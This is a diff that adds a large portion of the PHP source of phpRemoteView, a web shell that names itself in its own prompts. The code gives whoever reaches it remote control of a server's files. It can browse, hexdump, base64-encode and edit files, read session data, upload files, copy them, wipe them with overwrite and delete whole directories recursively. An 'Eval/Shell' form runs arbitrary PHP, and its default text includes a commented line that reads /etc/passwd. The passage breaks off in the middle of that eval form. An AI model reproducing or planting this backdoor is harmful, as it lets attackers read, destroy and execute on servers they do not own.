+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
